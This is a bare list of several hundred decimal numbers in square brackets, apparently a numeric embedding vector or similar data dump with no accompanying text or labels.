[ -0.013042734004557133, 0.001521027646958828, -0.027734549716114998, 0.0353802889585495, -0.003398106899112463, 0.031832266598939896, 0.017923347651958466, 0.05426976829767227, -0.01599109172821045, 0.030532989650964737, 0.022420842200517654, -0.020255383104085922, 0.02095499262213707, -0.006292327772825956, 0.0019020653562620282, 0.030199842527508736, 0.03223204240202904, 0.01912268064916134, -0.0015980680473148823, -0.03386446833610535, 0.003966540098190308, -0.0044725085608661175, -0.004984722938388586, 0.007937245070934296, -0.00042632498661987484, -0.009311479516327381, -0.006421422585844994, -0.020488586276769638, -0.05910040810704231, 0.009153233841061592, 0.011410309933125973, 0.035813380032777786, -0.002706825267523527, 0.004514151718467474, 0.008174612186849117, 0.011943346820771694, 0.0199055764824152, 0.03239861875772476, -0.021004965528845787, 0.022470815107226372, 0.007316756993532181, -0.024636276066303253, -0.00181149085983634, 0.02318708226084709, -0.020155437290668488, 0.03478062525391579, -0.006388107780367136, 0.0014856306370347738, -0.013692372478544712, 0.01452524121850729, -0.0126679427921772, -0.04823979362845421, 0.026085468009114265, -0.022937221452593803, -0.002002009656280279, -0.05027199536561966, 0.0153081389144063, 0.027651261538267136, -0.005871728993952274, 0.018889477476477623, 0.009977774694561958, -0.015483041293919086, 0.00037713366327807307, 0.02077176235616207, 0.003300244687125087, 0.02135477028787136, -0.07182665169239044, 0.050705086439847946, -0.024336442351341248, 0.0040644025430083275, -0.006879500579088926, 0.009677941910922527, 0.0057093193754553795, 0.0238200630992651, 0.01907270774245262, -0.0199055764824152, 0.03121594339609146, 0.005692661739885807, 0.02715153992176056, 0.0489727184176445, -0.0350138284265995, 0.030666248872876167, -0.0321321003139019, -0.012676271609961987, 0.0007735274266451597, -0.02466958947479725, -0.0029983296990394592, -0.07016091048717499, 0.020671816542744637, 0.003408517688512802, -0.022087695077061653, 0.008861729875206947, -0.0222709272056818, -0.02480284869670868, -0.0018166962545365095, -0.008486938662827015, -0.020988307893276215, 0.0006980486214160919, -0.029333658516407013, 0.004255962558090687, -0.02357020229101181, -0.0050721741281449795, -0.013883931562304497, 0.032865025103092194, 0.04184335470199585, 0.02728479914367199, 0.029333658516407013, 0.02938362956047058, -0.02715153992176056, 0.04740692302584648, 0.027584632858633995, 0.028617391362786293, 0.002527758479118347, -0.020272040739655495, -0.022637389600276947, 0.007720698602497578, -0.001977023668587208, -0.058467429131269455, -0.0038665959145873785, -0.006292327772825956, -0.022670703008770943, -0.0007454180740751326, -0.007075225003063679, -0.005309542175382376, -0.04754018038511276, 0.028417501598596573, -0.020322011783719063, -0.004216400906443596, 0.0029775078874081373, 0.02461961843073368, -0.01652412861585617, -0.02611878328025341, 0.011202092282474041, -0.011826744303107262, 0.025385858491063118, 0.04081059619784355, 0.02180451899766922, -0.007849793881177902, -0.011510253883898258, 0.006575503386557102, -0.04380892589688301, -0.08608537912368774, 0.003529283916577697, -0.004968065768480301, -0.05130475014448166, 0.04694051668047905, -0.00742503022775054, 0.011751786805689335, 0.01145195309072733, 0.006916979793459177, 0.01822318136692047, -0.03791221231222153, 0.02540251426398754, 0.04117706045508385, 0.029600176960229874, -0.02468624711036682, -0.03324814513325691, -0.005172118544578552, -0.00950303953140974, 0.0019155994523316622, -0.008795100264251232, -0.024719562381505966, -0.03186558187007904, 0.004016512539237738, -0.040244247764348984, -0.0022133502643555403, 0.06776224821805954, 0.03661293536424637, -0.013592427596449852, 0.013950561173260212, -0.033314771950244904, -0.024136554449796677, 0.01983894780278206, -0.024186525493860245, 0.0009905939223244786, -0.014533570036292076, -0.018889477476477623, -0.004280948545783758, -0.0002092584181809798, -0.03637973219156265, 0.03178229555487633, -0.03318151459097862, 0.0027505510952323675, 0.00470154732465744, 0.022870592772960663, 0.0002756277099251747, 0.06909484416246414, 0.029133768752217293, -0.0009322931291535497, 0.01880618929862976, -0.002184199867770076, 0.019572429358959198, 0.0016230541514232755, 0.00849110260605812, 0.00035787353408522904, -0.04440859332680702, -0.004984722938388586, -0.059766702353954315, -0.019106023013591766, 0.013042734004557133, 0.007620754651725292, 0.01051081158220768, -0.0006772268679924309, 0.013625742867588997, 0.020122123882174492, 0.005592717789113522, 0.0002345047687413171, 0.007191826589405537, 0.02963349036872387, -0.044242020696401596, 0.027651261538267136, 0.004447522107511759, 0.01416710764169693, 0.0078123146668076515, -0.00991947390139103, 0.03128257393836975, 0.008212091401219368, -0.000375051487935707, 0.00000536810330231674, -0.028317557647824287, 0.04444190859794617, -0.016923904418945312, 0.026468588039278984, -0.01605772040784359, -0.05940024182200432, -0.006833693012595177, 0.01652412861585617, 0.016607414931058884, -0.03361460566520691, 0.01873956061899662, 0.05936692655086517, 0.0013877685414627194, 0.029200399294495583, -0.030133211985230446, -0.029150426387786865, -0.018822846934199333, 0.019089365378022194, -0.01390058919787407, -0.011235407553613186, 0.011901702731847763, 0.0056968261487782, 0.04877283051609993, -0.04977227374911308, -0.0015928626526147127, 0.02357020229101181, 0.03807878494262695, -0.0032440260984003544, -0.016215967014431953, 0.008928359486162663, -0.00046406438923440874, 0.03356463462114334, -0.011843401938676834, 0.02945026010274887, -0.03821204602718353, 0.00828704982995987, 0.046773944050073624, 0.03871176764369011, 0.033581290394067764, -0.019639059901237488, -0.005347021389752626, 0.02795109525322914, 0.0489727184176445, -0.01860630139708519, 0.010294265113770962, -0.024636276066303253, -0.0009026221814565361, 0.00398111529648304, -0.01021930668503046, -0.021654602140188217, -0.024852821603417397, 0.012101591564714909, 0.001199331833049655, -0.030866138637065887, -0.013051062822341919, -0.026485245674848557, 0.016532456502318382, 0.02735142968595028, 0.0227873045951128, 0.043575722724199295, -0.016757331788539886, -0.03761237859725952, -0.0003958732122555375, -0.02303716540336609, 0.03329811617732048, -0.008382829837501049, 0.011277050711214542, -0.01585783250629902, 0.004393385723233223, -0.056301966309547424, -0.015591314062476158, -0.014541898854076862, -0.0098611731082201, 0.004684890154749155, -0.03654630854725838, -0.007308428641408682, 0.032415274530649185, 0.02650190331041813, -0.013983876444399357, -0.012034961953759193, -0.025102682411670685, -0.013825630769133568, -0.023070480674505234, 0.009169891476631165, -0.017540227621793747, -0.030982740223407745, -0.003872842527925968, -0.024269811809062958, 0.017723459750413895, -0.03178229555487633, -0.02990000881254673, 0.015549670904874802, -0.030399730429053307, -0.010344237089157104, -0.04290942847728729, 0.028101012110710144, 0.0021040362771600485, 0.029167084023356438, -0.004993051756173372, 0.002402828074991703, -0.008253735490143299, -0.0169155765324831, -0.01599941961467266, -0.043908871710300446, -0.015649614855647087, 0.02938362956047058, -0.043975502252578735, 0.0032440260984003544, 0.012468053959310055, -0.01331758126616478, 0.0022945550736039877, -0.000598104321397841, -0.029167084023356438, -0.002675592666491866, -0.0013471661368384957, 0.003108684904873371, -0.06882832199335098, -0.030766192823648453, -0.004634917713701725, -0.004247633740305901, -0.03481393679976463, 0.003841609926894307, 0.022604074329137802, 0.030199842527508736, -0.01498331967741251, 0.027984410524368286, -0.015466383658349514, 0.02428646944463253, -0.003727090312168002, 0.024786191061139107, 0.011185435578227043, 0.0010275525273755193, 0.02453633025288582, -0.026668475940823555, -0.0005476116202771664, 0.022537443786859512, -0.009827857837080956, 0.022437499836087227, -0.04447522386908531, 0.03931143134832382, -0.007633247412741184, -0.002382006263360381, -0.05773450434207916, 0.0026797570753842592, 0.0483064204454422, -0.012226521968841553, 0.03677951171994209, -0.015083263628184795, -0.023270368576049805, -0.03997772932052612, -0.007570782210677862, -0.00910326186567545, -0.0012565916404128075, -0.0012628381373360753, -0.004705711733549833, -0.03637973219156265, -0.00936978030949831, 0.038745082914829254, -0.007537467405200005, 0.04004435986280441, 0.012118249200284481, -0.022753991186618805, -0.02193777821958065, 0.006783721037209034, -0.038411933928728104, 0.0014117135433480144, -0.0014002615353092551, 0.00036906523746438324, 0.003872842527925968, -0.008628526702523232, -0.04720703512430191, -0.002002009656280279, -0.0028255092911422253, -0.006792049389332533, -0.053836673498153687, -0.01005273312330246, 0.06536358594894409, 0.021987751126289368, -0.003908239305019379, -0.010669056326150894, 0.005488608963787556, 0.00950303953140974, -0.021704575046896935, -0.00674207741394639, 0.003916568122804165, -0.032282017171382904, 0.0030274800956249237, -0.044175390154123306, -0.028434159234166145, 0.023853378370404243, 0.021654602140188217, -0.017023850232362747, 0.01998886466026306, 0.016091035678982735, 0.06896158307790756, 0.005263734143227339, 0.010452509857714176, -0.016307581216096878, 0.0472736656665802, -0.02793443761765957, -0.012842845171689987, -0.02466958947479725, -0.011651841923594475, -0.031099341809749603, 0.006958623416721821, 0.011052176356315613, 0.0008292255224660039, -0.020838391035795212, 0.007387551013380289, 0.03049967624247074, 0.015907805413007736, 0.03931143134832382, 0.03597995638847351, -0.0049763941206038, -0.010877273976802826, -0.02715153992176056, -0.023153766989707947, -0.03761237859725952, -0.026685133576393127, -0.01145195309072733, 0.02475287765264511, 0.02193777821958065, 0.04250965267419815, 0.01103551872074604, -0.0023736776784062386, 0.033398061990737915, 0.006916979793459177, -0.06149907410144806, 0.0169155765324831, -0.012967775575816631, -0.015657944604754448, 0.03551355004310608, -0.022170981392264366, -0.021821176633238792, 0.0016032734420150518, 0.04644079506397247, -0.003947800491005182, -0.006725419778376818, -0.0343475304543972, 0.04307600110769272, -0.0019249692559242249, 0.02638530172407627, 0.035346973687410355, 0.005484444554895163, 0.013109363615512848, 0.006254848558455706, 0.008903373032808304, 0.05433639511466026, -0.0002648264344315976, 0.011476939544081688, -0.002115488052368164, -0.008307871408760548, -0.011968332342803478, 0.01086894515901804, 0.017656829208135605, 0.0005554197705350816, 0.04367566853761673, -0.0013357142452150583, -0.005538580939173698, -0.01312602125108242, -0.035680122673511505, -0.01769014447927475, -0.03126591444015503, -0.019805632531642914, 0.035147085785865784, -0.021304797381162643, -0.001217030338011682, 0.04134363308548927, 0.013925575651228428, -0.008603540249168873, 0.024069923907518387, 0.012143234722316265, 0.013534126803278923, -0.03269844874739647, -0.02193777821958065, -0.01452524121850729, -0.013609085232019424, -0.0411437451839447, -0.012251508422195911, 0.027851151302456856, -0.009719585068523884, 0.03343137726187706, -0.017790088430047035, -0.01651579886674881, -0.017706802114844322, 0.011893373914062977, 0.012451396323740482, -0.006579667795449495, 0.01887281984090805, 0.007791492622345686, -0.06592993438243866, -0.00851608905941248, -0.009619641117751598, 0.002967097098007798, -0.03611321374773979, 0.03308156877756119, -0.004251798149198294, 0.0030545482877641916, 0.015499698929488659, 0.017840061336755753, -0.01145195309072733, -0.008012203499674797, -0.02043861337006092, -0.0007922669756226242, -0.00030061378492973745, -0.03016652725636959, 0.056968264281749725, -0.021271483972668648, 0.0060591246001422405, 0.0472736656665802, -0.007395879831165075, 0.010435853153467178, 0.009877830743789673, -0.014208750799298286, 0.03977784141898155, -0.017473598942160606, 0.017923347651958466, 0.007745685055851936, 0.0193891990929842, 0.0021800354588776827, 0.010452509857714176, -0.019372541457414627, 0.01485006045550108, -0.02880062162876129, -0.016099363565444946, 0.009253178723156452, -0.004497494548559189, -0.0025381692685186863, 0.018523015081882477, -0.0018468877533450723, -0.010502482764422894, 0.0005455294158309698, 0.010719028301537037, -0.019405854865908623, 0.01715710759162903, -0.02055521495640278, 0.0072209774516522884, 0.01998886466026306, 0.01905605010688305, 0.015832846984267235, -0.01710713654756546, 0.018956106156110764, 0.051804471760988235, -0.002540251472964883, -0.004697382915765047, 0.002234172075986862, -0.010485825128853321, 0.02728479914367199, 0.03677951171994209, -0.047373607754707336, -0.03134920075535774, 0.01514989323914051, -0.020088808611035347, -0.010310922749340534, -0.024919450283050537, -0.018839504569768906, 0.014758444391191006, -0.0023840884678065777, 0.03141583129763603, 0.020855048671364784, -0.0314658023416996, 0.006679612211883068, -0.01750691421329975, -0.014117135666310787, 0.023386972025036812, -0.01416710764169693, 0.0015439315466210246, -0.006916979793459177, -0.01907270774245262, 0.024386415258049965, -0.016474155709147453, -0.014183765277266502, 0.010027746669948101, 0.013717358000576496, -0.0057717845775187016, 0.03714597225189209, 0.011460281908512115, -0.03787889704108238, 0.021121567115187645, 0.006962787825614214, -0.0168406181037426, -0.006263177376240492, 0.021954435855150223, 0.0140338484197855, -0.04754018038511276, -0.029783407226204872, 0.004318427760154009, -0.019805632531642914, -0.002948357490822673, -0.03314819931983948, -0.021388085559010506, -0.04014430195093155, 0.011418638750910759, 0.040177617222070694, -0.007129361387342215, 0.01715710759162903, -0.002629784867167473, -0.0062381913885474205, 0.03571343794465065, -0.014999977312982082, -0.0029400286730378866, 0.014233737252652645, -0.02233755588531494, 0.006113260984420776, 0.020938334986567497, 0.04367566853761673, 0.043375834822654724, 0.0021550494711846113, -0.01735699735581875, -0.02155465818941593, -0.009244849905371666, -0.022604074329137802, -0.031182628124952316, 0.006858679000288248, -0.04883945733308792, -0.01795666292309761, 0.025302570313215256, 0.007841465063393116, 0.017390312626957893, 0.0030857808887958527, 0.023203739896416664, -0.0297667495906353, 0.03379783779382706, 0.017323682084679604, 0.011568555608391762, -0.021171538159251213, 0.0031690679024904966, 0.02480284869670868, 0.030083240941166878, 0.028750650584697723, 0.024303127080202103, -0.0029816722963005304, -0.005909208208322525, 0.011918360367417336, 0.023853378370404243, 0.0015428904443979263, -0.015216522850096226, -0.007987217046320438, 0.01439198199659586, -0.013267608359456062, 0.027834493666887283, -0.01191003154963255, -0.0023008014541119337, 0.004530809354037046, -0.005555238574743271, 0.015649614855647087, -0.0013440429465845227, 0.008536910638213158, -0.010752343572676182, -0.008087160997092724, 0.03441416099667549, 0.0010280731366947293, -0.022087695077061653, 0.006138246972113848, -0.025702347978949547, -0.008316200226545334, -0.02865070477128029, -0.011593541130423546, 0.005734305363148451, -0.02312045358121395, -0.009627969935536385, -0.0027151540853083134, -0.011951674707233906, 0.023936664685606956, -0.011918360367417336, -0.022770646959543228, 0.009511368349194527, -0.01689891889691353, -0.02598552405834198, -0.013367553241550922, -0.009153233841061592, 0.010802315548062325, 0.00620071217417717, -0.01822318136692047, 0.023087138310074806, 0.009419752284884453, -0.03029978647828102, 0.029100455343723297, 0.0008058010716922581, 0.0025527444668114185, 0.0002987918851431459, -0.014591870829463005, 0.016798974946141243, -0.016857275739312172, 0.013059391640126705, 0.037379175424575806, 0.025419171899557114, -0.0015595478471368551, -0.02122151106595993, -0.01220986433327198, -0.01560797169804573, -0.03229867294430733, 0.015483041293919086, -0.024403071030974388, 0.011401981115341187, 0.007987217046320438, -0.024436386302113533, 0.0074125370010733604, -0.007445851806551218, -0.017740117385983467, 0.0015709998551756144, -0.001316974638029933, -0.005742634180933237, -0.014275380410254002, -0.04141026362776756, 0.007029417436569929, 0.005009708926081657, 0.012984433211386204, -0.013467497192323208, 0.0214213989675045, 0.013267608359456062, -0.002215432468801737, -0.016857275739312172, 0.004004019312560558, 0.005884221754968166, -0.037245918065309525, 0.03106602653861046, -0.0034793117083609104, 0.025669032707810402, 0.026068810373544693, -0.02900051139295101, 0.02911711297929287, 0.008066339418292046, -0.033464688807725906, -0.02187114953994751, -0.013059391640126705, 0.014092149212956429, 0.014675158075988293, 0.009419752284884453, -0.007445851806551218, -0.004872285760939121, 0.0025673196651041508, 0.00809965468943119, 0.019405854865908623, -0.030782850459218025, -0.0036250639241188765, 0.0037520762998610735, 0.02233755588531494, -0.02721817046403885, 0.021821176633238792, 0.023270368576049805, -0.005684333387762308, 0.007071060594171286, -0.010793986730277538, -0.011218749918043613, 0.003618817310780287, -0.010136020369827747, 0.042476337403059006, -0.01985560543835163, 0.022054379805922508, 0.005147132556885481, 0.004183086100965738, 0.03171566501259804, 0.024702904745936394, 0.006746241822838783, 0.004626589361578226, -0.0155663276091218, -0.026068810373544693, -0.00533869257196784, -0.0267017912119627, -0.0008047600276768208, -0.04973895847797394, -0.00574679858982563, 0.012584655545651913, 0.01833978295326233, 0.032748423516750336, 0.0025943880900740623, 0.009544682689011097, 0.01390058919787407, 0.04863956943154335, -0.013659057207405567, -0.0015189454425126314, -0.024469701573252678, 0.021921120584011078, 0.015133235603570938, 0.023403627797961235, -0.01149359717965126, 0.014550227671861649, 0.02513599768280983, -0.010927245952188969, -0.0394446924328804, 0.018689587712287903, -0.004385056905448437, 0.02023872546851635, -0.017656829208135605, 0.006721255835145712, -0.02558574639260769, -0.01905605010688305, -0.013042734004557133, -0.010843958705663681, 0.037379175424575806, 0.00030191513360477984, -0.008528581820428371, 0.005796770565211773, 0.009286493062973022, 0.01348415482789278, -0.0031815608963370323, 0.0030358086805790663, -0.027451373636722565, 0.021954435855150223, 0.06423088163137436, -0.020671816542744637, -0.0038187059108167887, 0.030532989650964737, -0.0032440260984003544, -0.03987778350710869, -0.016890591010451317, 0.02715153992176056, 0.017740117385983467, 0.021271483972668648, 0.012184878811240196, 0.0016126432456076145, 0.020671816542744637, -0.010935574769973755, -0.014708472415804863, -0.02663516253232956, 0.00574679858982563, -0.012301480397582054, 0.002658935496583581, -0.0007750890217721462, 0.02068847417831421, -0.00904496107250452, -0.042276449501514435, -0.020855048671364784, 0.0020384476520121098, 0.003789555514231324, -0.02460296079516411, 0.0006996102747507393, -0.021787861362099648, -0.0207551047205925, 0.035613492131233215, 0.05720146745443344, 0.00239866366609931, -0.010102705098688602, 0.028234271332621574, 0.00669210497289896, -0.01605772040784359, -0.00674207741394639, 0.03484725207090378, -0.016490813344717026, -0.0026318670716136694, 0.041510209441185, 0.01644084043800831, -0.0026984966825693846, -0.03488056734204292, -0.011335351504385471, -0.03941137716174126, 0.0006163233192637563, -0.019155994057655334, 0.007687384262681007, -0.025119340047240257, -0.029683463275432587, -0.0060716173611581326, 0.025802291929721832, -0.012034961953759193, 0.00357509171590209, -0.01932256855070591, -0.024786191061139107, 0.016865603625774384, 0.031765636056661606, -0.016682373359799385, -0.010285936295986176, -0.015133235603570938, -0.024369757622480392, 0.02343694306910038, 0.02220429666340351, -0.03441416099667549, -0.011710142716765404, -0.013783987611532211, -0.0207551047205925, -0.021987751126289368, 0.003219040110707283, 0.030849481001496315, -0.04720703512430191, -0.03528034687042236, -0.010877273976802826, 0.02017209492623806, 0.04117706045508385, 0.008411980234086514, -0.016565771773457527, -0.00484729977324605, -0.01220986433327198, -0.025752320885658264, 0.048139847815036774, -0.014217079617083073, 0.03138251602649689, -0.004668232519179583, 0.03023315779864788, 0.0154747124761343, 0.028184298425912857, -0.01664073020219803, 0.019022736698389053, -0.0067087626084685326, 0.0011691403342410922, -0.007953902706503868, 0.03474730998277664, 0.028567418456077576, -0.023220397531986237, -0.02063850313425064, -0.004314263351261616, 0.022737333551049232, -0.012059948407113552, 0.03847856447100639, 0.03481393679976463, 0.010210977867245674, 0.010952231474220753, -0.026351986452937126, -0.05420313775539398, -0.010044404305517673, 0.02540251426398754, 0.015049949288368225, -0.020388642325997353, -0.008053846657276154, 0.02585226483643055, -0.014608528465032578, 0.022770646959543228, 0.011876717209815979, -0.028350872918963432, 0.004397550132125616, 0.01152691151946783, -0.024519672617316246, 0.01076900027692318, 0.027134884148836136, 0.015058278106153011, -0.03794552758336067, -0.011835073120892048, 0.0311326552182436, -0.01735699735581875, 0.003858267329633236, -0.0077831638045609, -0.035546865314245224, -0.0011108395410701632, 0.002692250069230795, -0.0466073676943779, -0.009378109127283096, -0.03734586015343666, 0.019555771723389626, -0.02155465818941593, -0.00101662112865597, -0.01827315427362919, 0.03309822827577591, -0.006134082563221455, 0.020471928641200066, -0.011352009139955044, -0.016890591010451317, 0.008441130630671978, 0.015624629333615303, -0.01465850044041872, 0.021771205589175224, -0.06196548044681549, -0.023020507767796516, -0.01689891889691353, -0.002177953254431486, 0.0002686003572307527, 0.006013316567987204, -0.014192094095051289, 0.016107693314552307, -0.01860630139708519, 0.016424182802438736, -0.003976951353251934, 0.016790645197033882, -0.014092149212956429, -0.008332857862114906, -0.0013679879484698176, -0.02128813974559307, 0.0007173087215051055, 0.006817035377025604, 0.014100478030741215, 0.015557999722659588, -0.005326199345290661, 0.011835073120892048, -0.005546909756958485, 0.025152653455734253, 0.020988307893276215, -0.028767306357622147, 0.0017219573492184281, -0.008503596298396587, 0.0001968955184565857, -0.008482774719595909, -0.017573542892932892, 0.021521344780921936, -0.01762351579964161, 0.023753434419631958, 0.009161562658846378, 0.025086024776101112, -0.007337579037994146, -0.0015095756389200687, 0.029733436182141304, 0.019172651693224907, -0.049272552132606506, -0.013908918015658855, -0.001649081357754767, 0.01945582777261734, 0.014608528465032578, -0.03687945380806923, -0.010394209064543247, 0.0035105443093925714, 0.0031295064836740494, -0.010452509857714176, 0.016923904418945312, 0.008636855520308018, 0.0005267898668535054, -0.01822318136692047, -0.012717914767563343, -0.017790088430047035, 0.013275937177240849, 0.03341471776366234, 0.0005673922132700682, -0.016482483595609665, 0.005405322182923555, -0.01985560543835163, 0.018039949238300323, -0.02148802950978279, 0.019739003852009773, -0.004208072554320097, -0.02330368384718895, -0.03681282326579094, -0.00963629875332117, -0.05416982248425484, -0.014741787686944008, -0.005642689764499664, 0.02996663935482502, 0.022054379805922508, 0.007995545864105225, 0.005638525355607271, 0.006113260984420776, 0.026851708069443703, 0.00106451113242656, 0.013550784438848495, -0.026751764118671417, -0.025435829535126686, 0.04067733883857727, -0.010402537882328033, 0.056501857936382294, -0.018639616668224335, 0.01847304217517376, 0.00917822029441595, -0.02148802950978279, -0.03844524919986725, 0.007591604255139828, 0.000570515519939363, -0.007395879831165075, -0.02970012091100216, 0.01749025657773018, -0.014158778823912144, -0.024119896814227104, -0.005276227369904518, -0.0127595579251647, -0.01593279093503952, -0.01605772040784359, 0.0029462752863764763, -0.027434716001152992, 0.00579260615631938, 0.0022175146732479334, -0.025968866422772408, -0.02115488052368164, 0.002005132846534252, 0.0074042086489498615, 0.007666562218219042, -0.012767886742949486, -0.021854491904377937, -0.0030920275021344423, 0.00959465466439724, 0.014083820395171642, 0.0014294120483100414, -0.03458073362708092, 0.021204853430390358, 0.006800378207117319, 0.022437499836087227, -0.02780117839574814, -0.04001104459166527, -0.02565237507224083, 0.0003302847617305815, 0.00389158190228045, 0.012109920382499695, -0.028567418456077576, -0.02207103744149208, -0.0021904464811086655, 0.0836867094039917, 0.012134905904531479, 0.009303150698542595, 0.00936978030949831, -0.0023028836585581303, 0.02663516253232956, 0.004024840891361237, 0.01331758126616478, 0.013892260380089283, -0.0056510185822844505, 0.013109363615512848, -0.00868682749569416, -0.016832290217280388, -0.0037624873220920563, 0.0038770067039877176, -0.0364130474627018, 0.013367553241550922, 0.0024798684753477573, 0.011535240337252617, -0.009969445876777172, -0.026335328817367554, 0.019539114087820053, 0.00006923226465005428, -0.027717892080545425, 0.02233755588531494, -0.013983876444399357, -0.015083263628184795, -0.016232622787356377, 0.006142411381006241, -0.02220429666340351, -0.003581338096410036, 0.006800378207117319, 0.025102682411670685, -0.0036271458957344294, -0.005805099382996559, -0.001745902351103723, 0.009986103512346745, 0.015166550874710083, -0.007599932607263327, -0.01599941961467266, -0.007799821440130472, 0.007679055444896221, -0.001112921629101038, 0.010494153946638107, -0.007808150257915258, 0.002673510694876313, 0.01644084043800831, 0.023270368576049805, -0.016807302832603455, -0.007970559410750866, 0.02715153992176056, -0.0069461301900446415, -0.0042434693314135075, 0.011018861085176468, -0.0013357142452150583, 0.016107693314552307, 0.01439198199659586, 0.013250951655209064, 0.02187114953994751, 0.009186549112200737, 0.007208484224975109, 0.011252065189182758, 0.0015501780435442924, -0.003668789518997073, -0.012551341205835342, 0.006883664987981319, -0.02290390618145466, -0.009161562658846378, 0.020222067832946777, 0.016632400453090668, -0.030183184891939163, 0.008008038625121117, 0.020738447085022926, 0.0004710917128250003, 0.022370871156454086, 0.02408658154308796, 0.02173789031803608, 0.03454742208123207, -0.0060091521590948105, -0.008312036283314228, 0.04134363308548927, 0.03028312884271145, -0.0236368328332901, 0.022304240614175797, -0.0057717845775187016, 0.01469181478023529, -0.01244306843727827, -0.018139895051717758, -0.020605187863111496, -0.019505800679326057, -0.008986660279333591, 0.007183498237282038, 0.025152653455734253, -0.0039498829282820225, -0.010594097897410393, -0.005276227369904518, 0.017257053405046463, 0.010943903587758541, -0.015907805413007736, -0.013017747551202774, 0.0018843668513000011, -0.0012024551397189498, 0.005413650535047054, -0.018506357446312904, 0.003764569526538253, 0.0022008572705090046, 0.009619641117751598, 0.0029566860757768154, 0.014800088480114937, -0.01978897489607334, 0.013001090846955776, -0.012959446758031845, 0.015766216441988945, -0.03787889704108238, -0.01090225949883461, -0.0017948334570974112, 0.004108128137886524, -0.0048348065465688705, 0.027717892080545425, -0.008853401057422161, -0.018656272441148758, -0.010152677074074745, 0.03324814513325691, -0.022237611934542656, -0.006721255835145712, 0.014974990859627724, -0.010602426715195179, 0.0018708327552303672, 0.011468610726296902, -0.009128248319029808, 0.011960003525018692, -0.0040144301019608974, 0.007862286642193794, -0.0030670412816107273, 0.018822846934199333, -0.02453633025288582, 0.048739515244960785, 0.0054802801460027695, -0.026335328817367554, 0.008128805086016655, -0.005446965340524912, 0.010802315548062325, 0.0077623422257602215, -0.010194321162998676, -0.006150740198791027, -0.00991947390139103, -0.027518002316355705, -0.002250829478725791, -0.006329806987196207, 0.02880062162876129, -0.007125197444111109, -0.018389755859971046, 0.024652931839227676, 0.008653512224555016, -0.010777329094707966, 0.01171847153455019, 0.030199842527508736, 0.015716245397925377, 0.015524684451520443, -0.029750093817710876, 0.007445851806551218, -0.010127691552042961, 0.033064913004636765, -0.018423069268465042, -0.004897271748632193, 0.021138224750757217, 0.02546914480626583, -0.06316480785608292, -0.01244306843727827, -0.003387696109712124, 0.017456941306591034, -0.011335351504385471, 0.001369028934277594, -0.006463066209107637, 0.010652398690581322, 0.03288168087601662, -0.013892260380089283, 0.015049949288368225, 0.007629083003848791, -0.02128813974559307, -0.01730702444911003, 0.0016095200553536415, -0.006308985408395529, 0.027134884148836136, 0.011901702731847763, -0.0012659614440053701, 0.028051039204001427, -0.02781783603131771, -0.028634048998355865, 0.016624072566628456, 0.01566627249121666, 0.041510209441185, 0.005730140954256058, -0.017773432657122612, -0.002654771087691188, -0.025319227948784828, 0.005988330580294132, -0.016224294900894165, 0.0028255092911422253, 0.006209040991961956, -0.01204329077154398, 0.043309204280376434, 0.009194877929985523, -0.006592161022126675, 0.010111033916473389, -0.030782850459218025, -0.017923347651958466, -0.009627969935536385, 0.034247588366270065, -0.00855356827378273, -0.02350357361137867, -0.014483598060905933, 0.015358110889792442, -0.016432512551546097, 0.0004885299131274223, 0.0013232211349532008, -0.016141008585691452, -0.027468031272292137, 0.012601313181221485, 0.025102682411670685, 0.007953902706503868, 0.009769557043910027, -0.002673510694876313, 0.012651285156607628, 0.01331758126616478, 0.008528581820428371, 0.027268141508102417, -0.024952765554189682, 0.003162821289151907, 0.03119928576052189, 0.005117982160300016, -0.005376171786338091, 0.031765636056661606, 0.019222624599933624, -0.016091035678982735, 0.011060505174100399, -0.003277340903878212, -0.01162685640156269, -0.005917536560446024, -0.006783721037209034, 0.012434739619493484, -0.007828972302377224, -0.023536887019872665, 0.01690724678337574, 0.017873376607894897, -0.00033757236087694764, -0.006367286201566458, 0.022121010348200798, -0.009677941910922527, 0.02337031438946724, 0.017123794183135033, 0.0394446924328804, -0.007129361387342215, -0.015191536396741867, -0.019539114087820053, -0.0006230903672985733, 0.035147085785865784, -0.006754570174962282, 0.0002980110584758222, -0.020521901547908783, 0.033331431448459625, -0.005051352549344301, -0.00027016198146156967, 0.002523594070225954, -0.033931098878383636, -0.00033627101220190525, -0.01998886466026306, -0.020788418129086494, -0.004020676948130131, -0.008178777061402798, -0.016424182802438736, 0.018189866095781326, -0.003789555514231324, 0.013142677955329418, -0.020671816542744637, -0.01867293007671833, 0.02162128873169422, -0.020155437290668488, -0.016532456502318382, 0.004684890154749155, 0.007400044240057468, 0.03233198821544647, 0.00008042394620133564, -0.017840061336755753, -0.005492773372679949, -0.011368666775524616, 0.01983894780278206, -0.011568555608391762, 0.018256496638059616, -0.0030233156867325306, -0.015008305199444294, -0.0002917645324487239, -0.018889477476477623, -0.006529695820063353, 0.007695712614804506, 0.028400843963027, -0.0263686440885067, 0.013592427596449852, 0.020322011783719063, -0.0071168686263263226, -0.006725419778376818, 0.010036075487732887, 0.041510209441185, -0.0003857226110994816, -0.004539137706160545, 0.017840061336755753, 0.02062184549868107, -0.0028838100843131542, 0.00836200825870037, -0.013051062822341919, 0.007075225003063679, 0.001576205249875784, -0.018289810046553612, -0.007391715422272682, -0.00950303953140974, -0.02292056381702423, -0.003612570697441697, 0.005942522548139095, -0.0006631722208112478, 0.00007658493996132165, 0.01244306843727827, 0.002935864496976137, -0.02343694306910038, 0.008482774719595909, -0.00047031091526150703, -0.021188195794820786, -0.001569958752952516, 0.0029566860757768154, -0.024169867858290672, -0.015649614855647087, -0.000798513472545892, 0.025435829535126686, -0.0027942766901105642, 0.0294336024671793, 0.0051221465691924095, 0.020838391035795212, 0.010161005891859531, 0.0037937199231237173, -0.005971673410385847, 0.0022071036510169506, -0.01566627249121666, 0.014125464484095573, -0.011576883494853973, 0.01005273312330246, 0.00732925022020936, -0.008145461790263653, 0.029350316151976585, -0.014416968449950218, 0.007887273095548153, -0.023620175197720528, -0.018423069268465042, 0.007666562218219042, -0.013650728389620781, 0.016165994107723236, -0.00923652108758688, -0.012459725141525269, -0.002402828074991703, 0.007937245070934296, 0.01860630139708519, 0.013209307566285133, -0.0013430018443614244, -0.007883108220994473, -0.011252065189182758, -0.0018364768475294113, -0.01670735888183117, 0.023803405463695526, -0.003156574908643961, 0.00940309464931488, 0.01188504509627819, -0.006038302555680275, 0.017989978194236755, -0.0028858922887593508, 0.013309252448379993, 0.020855048671364784, 0.0199055764824152, -0.00792891625314951, 0.016990534961223602, -0.003789555514231324, 0.01331758126616478, -0.010993875563144684, -0.0010223471326753497, -0.01462518610060215, 0.0028463308699429035, -0.02886725217103958, -0.004709876142442226, 